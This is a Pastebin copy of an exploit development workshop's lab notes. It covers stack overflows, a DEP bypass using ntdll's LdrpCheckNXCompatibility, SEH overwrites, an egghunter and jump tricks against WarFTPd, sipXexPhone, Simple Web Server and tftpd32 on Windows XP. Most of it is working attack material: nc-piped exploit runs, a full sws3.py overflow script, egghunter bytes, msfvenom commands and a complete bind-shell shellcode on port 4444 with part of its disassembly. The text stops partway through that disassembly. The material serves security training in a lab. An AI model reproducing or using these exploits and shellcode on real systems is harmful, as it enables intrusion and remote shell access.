Advertisement
joemccray

Exploit Development Workshop

Dec 9th, 2016
1,265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.47 KB | None | 0 0
  1. Exploit Development Course
  2.  
  3.  
  4. ##########################
  5. # Download the attack VM #
  6. ##########################
  7. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
  8. user: strategicsec
  9. pass: strategicsec
  10.  
  11.  
  12. cd /home/strategicsec/toolz/metasploit
  13. mkdir DLLs
  14. cd DLLs
  15. wget https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/DLLs.zip
  16. unzip DLLs.zip
  17.  
  18.  
  19.  
  20.  
  21. You can download the Exploit Dev VMs from the links below:
  22. https://s3.amazonaws.com/StrategicSec-VMs/XPSP3-ED-Target.zip
  23. user: Administrator
  24. pass: strategicsec
  25.  
  26.  
  27. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-XP-ED-Attack-Host.zip
  28. user: Administrator
  29. pass: strategicsec
  30.  
  31. Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:
  32. https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip
  33.  
  34.  
  35.  
  36. ###########################
  37. # Lab 1a: Stack Overflows #
  38. ###########################
  39.  
  40. #############################
  41. # Start WarFTPd #
  42. # Start WinDBG #
  43. # Press F6 #
  44. # Attach to war-ftpd.exe #
  45. #############################
  46. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
  47.  
  48.  
  49. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  50.  
  51. At WINDBG prompt
  52. “r” to show registers or “alt+4”
  53.  
  54. dd esp
  55.  
  56.  
  57. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  58.  
  59.  
  60. At WINDBG prompt
  61. “r” to show registers or “alt+4”
  62. dd esp
  63.  
  64. Eip: 32714131
  65. esp: affd58 (71413471)
  66.  
  67. Now we need to SSH into the StrategicSec Ubuntu host
  68.  
  69. cd /home/strategicsec/toolz/metasploit/tools/exploit
  70.  
  71. ruby pattern_offset.rb 32714131
  72. 485
  73.  
  74. ruby pattern_offset.rb 71413471
  75. 493
  76.  
  77. Distance to EIP is: 485
  78. Relative position of ESP is: 493
  79.  
  80. RET – POP EIP
  81. RET 4 – POP EIP and shift ESP down by 4 bytes
  82.  
  83. cd /home/strategicsec/toolz/metasploit/
  84. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
  85.  
  86. 0x7c9c167d push esp; retn 0x304d
  87. 0x7c9d30d7 jmp esp < - how about we use this one
  88. 0x7c9d30eb jmp esp
  89. 0x7c9d30ff jmp esp
  90.  
  91.  
  92. warftpd3.py with Notepad++
  93. Fill in the appropriate values
  94. Distance to EIP
  95. Address of JMP ESP
  96.  
  97.  
  98.  
  99. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  100.  
  101. 0:003> dd eip
  102. 0:003> dd esp
  103.  
  104.  
  105.  
  106.  
  107.  
  108. Mention bad characters
  109. No debugger
  110.  
  111.  
  112.  
  113. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  114.  
  115. nc XPSP3-ED-Target-IP 4444
  116.  
  117.  
  118.  
  119. -------------------------------------------------------------
  120.  
  121. There are 2 things that can go wrong with shellcode. The first thing is a lack of space, and the second is bad characters.
  122.  
  123. Shellcode test 1: Calculate space for shellcode
  124. Look in the warftpd3.py script for the shellcode variable. Change the length of the shellcode being send to test how much you can send before the CCs truncate.
  125.  
  126.  
  127.  
  128.  
  129.  
  130. Shellcode test 2: Identify bad characters
  131.  
  132. Replace the INT3 (cc) dummy shellcode with this string:
  133. "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
  134.  
  135.  
  136. Send this new shellcode string and identify the places where it truncates - these are the bad characters
  137.  
  138.  
  139.  
  140.  
  141. Here is what the string looks like after I manually tested and removed each of the bad characters:
  142. shellcode = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
  143.  
  144.  
  145.  
  146.  
  147. ./msfvenom -p windows/shell/bind_tcp -f python -b '\x00\x0a\x0d\x40'
  148.  
  149.  
  150.  
  151.  
  152.  
  153. ###########################################
  154. # Lab 1b: Stack Overflows with DEP Bypass #
  155. ###########################################
  156.  
  157. Reboot your target host and choose the "2nd" option for DEP.
  158.  
  159.  
  160. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
  161.  
  162.  
  163.  
  164. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  165.  
  166. At WINDBG prompt
  167. “r” to show registers or “alt+4”
  168.  
  169. dd esp
  170.  
  171.  
  172.  
  173.  
  174. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  175.  
  176.  
  177. At WINDBG prompt
  178. “r” to show registers or “alt+4”
  179. dd esp
  180.  
  181. Eip: 32714131
  182. esp: affd58 (71413471)
  183.  
  184. Now we need to SSH into the StrategicSec Ubuntu host
  185.  
  186. cd /home/strategicsec/toolz/metasploit/tools/exploit
  187.  
  188. ruby pattern_offset.rb 32714131
  189. 485
  190.  
  191. ruby pattern_offset.rb 71413471
  192. 493
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199.  
  200.  
  201. cd /home/strategicsec/toolz/metasploit/tools/exploit
  202.  
  203. ruby pattern_offset.rb 32714131
  204.  
  205. cd /home/strategicsec/toolz/metasploit/
  206.  
  207. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  208.  
  209.  
  210.  
  211. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  212.  
  213. 0:003> dd eip
  214. 0:003> dd esp
  215.  
  216. INT3s - GOOD!!!!!!!
  217.  
  218.  
  219.  
  220. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  221.  
  222. nc XPSP3-ED-Target-IP 4444
  223.  
  224.  
  225. strategicsec....exploit no workie!!!!
  226.  
  227.  
  228. Why????????? DEP!!!!!!!!!!!!!
  229.  
  230.  
  231.  
  232.  
  233. Let's look through ole32.dll for the following instructions:
  234.  
  235. mov al,0x1
  236. ret 0x4
  237.  
  238. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  239.  
  240.  
  241.  
  242. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  243.  
  244. [DLLs/xpsp3/ole32.dll]
  245. 0x775ee00e b001c204
  246. 0x775ee00e mov al, 1
  247. 0x775ee010 ret 4
  248.  
  249.  
  250. Then we need to jump to the LdrpCheckNXCompatibility routine in
  251. ntdll.dll that disables DEP.
  252.  
  253.  
  254.  
  255. Inside of ntdll.dll we need to find the following instructions:
  256.  
  257. CMP AL,1
  258. PUSH 2
  259. POP ESI
  260. JE ntdll.7
  261.  
  262.  
  263.  
  264. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  265.  
  266. [DLLs/xpsp3/ntdll.dll]
  267. 0x7c91cd24 3c016a025e0f84
  268. 0x7c91cd24 cmp al, 1
  269. 0x7c91cd26 push 2
  270. 0x7c91cd28 pop esi
  271. 0x7c91cd29 jz 7
  272.  
  273.  
  274. This set of instructions makes sure that AL is set to 1, 2 is pushed
  275. on the stack then popped into ESI.
  276.  
  277.  
  278.  
  279.  
  280.  
  281. dep = "\x0e\xe0\x5e\x77"+\
  282. "\xff\xff\xff\xff"+\
  283. "\x24\xcd\x91\x7c"+\
  284. "\xff\xff\xff\xff"+\
  285. "A"*0x54
  286.  
  287.  
  288.  
  289. #############################
  290. # Start WarFTPd #
  291. # Start WinDBG #
  292. # Press F6 #
  293. # Attach to war-ftpd.exe #
  294. # bp 0x775ee00e #
  295. # g #
  296. #############################
  297.  
  298.  
  299.  
  300.  
  301. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  302.  
  303. ---------------------------------------------------------------------------
  304. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  305.  
  306. mov al,0x1
  307. ret 0x4
  308.  
  309.  
  310.  
  311.  
  312. 0:005> g
  313. Breakpoint 0 hit
  314. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  315. eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  316. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  317. ole32!CSSMappedStream::IsWriteable:
  318. 775ee00e b001 mov al,1
  319.  
  320.  
  321. 0:001> t
  322. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  323. eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  324. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  325. ole32!CSSMappedStream::IsWriteable+0x2:
  326. 775ee010 c20400 ret 4
  327.  
  328.  
  329.  
  330.  
  331.  
  332. ---------------------------------------------------------------------------
  333. Ok, so inside of ntdll.dll we need to find the following instructions:
  334.  
  335. CMP AL,1
  336. PUSH 2
  337. POP ESI
  338. JE ntdll.7
  339.  
  340. 0:001> t
  341. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  342. eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  343. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  344. ntdll!LdrpCheckNXCompatibility+0x13:
  345. 7c91cd24 3c01 cmp al,1
  346.  
  347.  
  348. 0:001> t
  349. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  350. eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  351. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  352. ntdll!LdrpCheckNXCompatibility+0x15:
  353. 7c91cd26 6a02 push 2
  354.  
  355.  
  356. 0:001> t
  357. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  358. eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  359. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  360. ntdll!LdrpCheckNXCompatibility+0x17:
  361. 7c91cd28 5e pop esi
  362.  
  363.  
  364. 0:001> t
  365. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
  366. eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  367. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  368. ntdll!LdrpCheckNXCompatibility+0x18:
  369. 7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
  370.  
  371.  
  372. ---------------------------------------------------------------------------
  373.  
  374.  
  375.  
  376. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  377.  
  378. nc XPSP3-ED-Target-IP 4444
  379.  
  380.  
  381. ##########################
  382. # Lab 1c: SEH Overwrites #
  383. ##########################
  384.  
  385. #################################################
  386. # On our VictimXP Host (XPSP3-ED-Target-IP) #
  387. # Start sipXexPhone if it isn’t already running #
  388. # Start WinDBG #
  389. # Press “F6” and Attach to sipXexPhone.exe #
  390. # Press “F5” to start the debugger #
  391. #################################################
  392.  
  393.  
  394. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
  395.  
  396.  
  397.  
  398. python sipex0.py XPSP3-ED-Target-IP
  399.  
  400. 0:003> !exchain
  401. 0:003> dds esp
  402. 0:003> dds
  403.  
  404. python sipex1.py XPSP3-ED-Target-IP
  405.  
  406. 0:003> !exchain
  407. 0:003> g
  408.  
  409. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  410.  
  411.  
  412. python sipex2.py XPSP3-ED-Target-IP
  413.  
  414. 0:003> !exchain
  415. 0:003> g
  416.  
  417.  
  418. ***ssh into instructor Ubuntu host***
  419. cd /home/strategicsec/toolz/metasploit/tools/exploit
  420. ruby pattern_offset.rb 41346941 We should see that SEH is at 252
  421.  
  422.  
  423.  
  424. !load narly
  425. !nmod
  426.  
  427. ***ssh into the Ubuntu host***
  428. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  429. cd /home/strategicsec/toolz/metasploit/
  430. ./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  431.  
  432.  
  433. #####################################
  434. # sipex3.py in Notepad++. #
  435. # Set cseq = 252 #
  436. # Set seh2 address to: 0x10015977 #
  437. #####################################
  438.  
  439.  
  440. python sipex3.py XPSP3-ED-Target-IP
  441. 0:003> !exchain
  442.  
  443. python sipex4.py XPSP3-ED-Target-IP
  444.  
  445.  
  446.  
  447. nc XPSP3-ED-Target-IP 4444
  448.  
  449.  
  450.  
  451.  
  452.  
  453. Brush up on the basics of Structured Exception Handlers:
  454. http://www.securitytube.net/video/1406
  455. http://www.securitytube.net/video/1407
  456. http://www.securitytube.net/video/1408
  457.  
  458.  
  459.  
  460.  
  461. Here are the slides for the exploit dev basics:
  462. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
  463. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
  464. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx
  465.  
  466.  
  467. Here are the exploit dev basic videos:
  468. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
  469. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
  470. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
  471. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
  472. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv
  473.  
  474.  
  475.  
  476. Recommended videos on Structured Exception Handling:
  477. http://www.securitytube.net/video/1406
  478. http://www.securitytube.net/video/1407
  479. http://www.securitytube.net/video/1408
  480.  
  481.  
  482. ########################################
  483. # Lab 2a: Not Enough Space (Egghunter) #
  484. ########################################
  485.  
  486. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
  487.  
  488. SWS - SIMPLE WEB SERVER
  489. -----------------------
  490.  
  491. Running SWS on Strategicsec-XP-ED-Target-VM
  492. Start > Programs > Simple Web Server (it's in the middle somewhere)
  493. Red icon in system tray
  494. Double click it
  495. - it will pop up a menu
  496. - select "start"
  497. - dialog box shows starting params - port 82
  498.  
  499. WinDBG
  500. - attach to "server.exe"
  501.  
  502.  
  503. python sws1.py | nc XPSP3-ED-Target-IP 82
  504.  
  505.  
  506.  
  507. python sws2.py | nc XPSP3-ED-Target-IP 82
  508.  
  509.  
  510. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  511. cd /home/strategicsec/toolz/metasploit/tools/exploit
  512. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  513. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  514.  
  515.  
  516.  
  517.  
  518.  
  519.  
  520.  
  521.  
  522. EGGHUNTER:
  523. ----------
  524.  
  525. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  526. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  527. ^^^^^^^^^^^^^^^^
  528. ABBA
  529. JMP ESP
  530. /
  531. /
  532. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  533. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  534.  
  535.  
  536.  
  537.  
  538. -----sws3.py-----
  539. #!/usr/bin/python2
  540.  
  541. import os # for output setting
  542. import sys
  543. import struct # for pack function
  544.  
  545. # turn off output buffer and set binary mode
  546. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
  547.  
  548.  
  549. pad = "A" * 225 # distance to EIP
  550. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  551.  
  552. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  553. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  554.  
  555. shellcode = "\xCC" * 700
  556.  
  557. buf = "GET /"
  558. buf += pad + struct.pack('<I', eip) + egghunter
  559. buf += " HTTP/1.0\r\n"
  560. buf += "User-Agent: ABBAABBA"
  561. buf += shellcode
  562. buf += " HTTP/1.0\r\n"
  563.  
  564. sys.stdout.write(buf)
  565. -----
  566.  
  567. ############################################
  568. # Lab 2b: Not Enough Space (Negative Jump) #
  569. ############################################
  570.  
  571. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
  572.  
  573.  
  574. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  575.  
  576. ^
  577. 1 ----------------------1 overflow the buffer---------------------------|
  578.  
  579. ^ ^
  580. |
  581. 2 ----jump over seh record---|
  582.  
  583. ^ ^
  584. |
  585. 3--POP 2 words off stack---|
  586.  
  587. ^
  588. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
  589.  
  590.  
  591. #########################################
  592. # Lab 2c: Not Enough Space (Trampoline) #
  593. #########################################
  594.  
  595. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  596. On the Strategicsec-XP-ED-Target-VM VM
  597.  
  598. - open a command prompt
  599. - c:\software\tftpd32
  600. - run tftpd32.exe
  601. - UDP port 69
  602. (socket code is already in the scripts)
  603.  
  604.  
  605.  
  606.  
  607. On your attack host please install:
  608.  
  609.  
  610. NASM - Netwide Assembler
  611.  
  612.  
  613.  
  614.  
  615.  
  616. -----------------------------------------------------------------------------------------------------------------
  617.  
  618.  
  619. We want to generate the shellcode (BIND SHELL on Port 4444)
  620. - No restricted characters
  621. - Encoder: NONE
  622.  
  623. Create a Python file called dumpshellcode.py
  624.  
  625. ---
  626. #!/usr/bin/python2
  627.  
  628. import os
  629. import sys
  630. import struct
  631.  
  632.  
  633. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  634. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  635. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  636. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  637. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  638. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  639. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  640. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  641. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  642. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  643. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  644. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  645. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  646. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  647. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  648. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  649. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  650. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  651. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  652. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  653. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  654.  
  655. sys.stdout.write(shellcode)
  656. ---
  657.  
  658.  
  659.  
  660. python dumpshell.py > bindshell.bin
  661.  
  662. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
  663.  
  664.  
  665.  
  666. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  667. 317 bindshell.bin
  668.  
  669. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  670. 00000000 FC cld
  671. 00000001 6AEB push byte -0x15
  672. 00000003 4D dec ebp
  673. 00000004 E8F9FFFFFF call dword 0x2
  674. 00000009 60 pushad
  675. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  676. 0000000E 8B453C mov eax,[ebp+0x3c]
  677. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  678. 00000015 01EF add edi,ebp
  679. 00000017 8B4F18 mov ecx,[edi+0x18]
  680. 0000001A 8B5F20 mov ebx,[edi+0x20]
  681. 0000001D 01EB add ebx,ebp
  682. 0000001F 49 dec ecx
  683. 00000020 8B348B mov esi,[ebx+ecx*4]
  684. 00000023 01EE add esi,ebp
  685. 00000025 31C0 xor eax,eax
  686. 00000027 99 cdq
  687. 00000028 AC lodsb
  688. 00000029 84C0 test al,al
  689. 0000002B 7407 jz 0x34
  690. 0000002D C1CA0D ror edx,0xd
  691. 00000030 01C2 add edx,eax
  692. 00000032 EBF4 jmp short 0x28
  693. 00000034 3B542428 cmp edx,[esp+0x28]
  694. 00000038 75E5 jnz 0x1f
  695. 0000003A 8B5F24 mov ebx,[edi+0x24]
  696. 0000003D 01EB add ebx,ebp
  697. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  698. 00000043 8B5F1C mov ebx,[edi+0x1c]
  699. 00000046 01EB add ebx,ebp
  700. 00000048 032C8B add ebp,[ebx+ecx*4]
  701. 0000004B 896C241C mov [esp+0x1c],ebp
  702. 0000004F 61 popad
  703. 00000050 C3 ret
  704. 00000051 31DB xor ebx,ebx
  705. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  706. 00000057 8B400C mov eax,[eax+0xc]
  707. 0000005A 8B701C mov esi,[eax+0x1c]
  708. 0000005D AD lodsd
  709. 0000005E 8B4008 mov eax,[eax+0x8]
  710. 00000061 5E pop esi
  711. 00000062 688E4E0EEC push dword 0xec0e4e8e
  712. 00000067 50 push eax
  713. 00000068 FFD6 call esi
  714. 0000006A 6653 push bx
  715. 0000006C 66683332 push word 0x3233
  716. 00000070 687773325F push dword 0x5f327377
  717. 00000075 54 push esp
  718. 00000076 FFD0 call eax
  719. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  720. 0000007D 50 push eax
  721. 0000007E FFD6 call esi PART 1
  722. 00000080 5F pop edi
  723. 00000081 89E5 mov ebp,esp
  724. 00000083 6681ED0802 sub bp,0x208
  725. 00000088 55 push ebp
  726. 00000089 6A02 push byte +0x2
  727. 0000008B FFD0 call eax
  728. 0000008D 68D909F5AD push dword 0xadf509d9
  729. 00000092 57 push edi
  730. 00000093 FFD6 call esi
  731. 00000095 53 push ebx
  732. 00000096 53 push ebx
  733. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  734. 00000097 53 push ebx
  735. 00000098 53 push ebx
  736. 00000099 53 push ebx
  737. 0000009A 43 inc ebx
  738. 0000009B 53 push ebx
  739. 0000009C 43 inc ebx
  740. 0000009D 53 push ebx PART 2
  741. 0000009E FFD0 call eax
  742. 000000A0 6668115C push word 0x5c11
  743. 000000A4 6653 push bx
  744. 000000A6 89E1 mov ecx,esp
  745. 000000A8 95 xchg eax,ebp
  746. 000000A9 68A41A70C7 push dword 0xc7701aa4
  747. 000000AE 57 push edi
  748. 000000AF FFD6 call esi
  749. 000000B1 6A10 push byte +0x10
  750. 000000B3 51 push ecx
  751. 000000B4 55 push ebp
  752. 000000B5 FFD0 call eax
  753. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  754. 000000BC 57 push edi
  755. 000000BD FFD6 call esi
  756. 000000BF 53 push ebx
  757. 000000C0 55 push ebp
  758. 000000C1 FFD0 call eax
  759. 000000C3 68E5498649 push dword 0x498649e5
  760. 000000C8 57 push edi
  761. 000000C9 FFD6 call esi
  762. 000000CB 50 push eax
  763. 000000CC 54 push esp
  764. 000000CD 54 push esp
  765. 000000CE 55 push ebp
  766. 000000CF FFD0 call eax
  767. 000000D1 93 xchg eax,ebx
  768. 000000D2 68E779C679 push dword 0x79c679e7
  769. 000000D7 57 push edi
  770. 000000D8 FFD6 call esi
  771. 000000DA 55 push ebp
  772. 000000DB FFD0 call eax
  773. 000000DD 666A64 push word 0x64
  774. 000000E0 6668636D push word 0x6d63
  775. 000000E4 89E5 mov ebp,esp
  776. 000000E6 6A50 push byte +0x50
  777. 000000E8 59 pop ecx
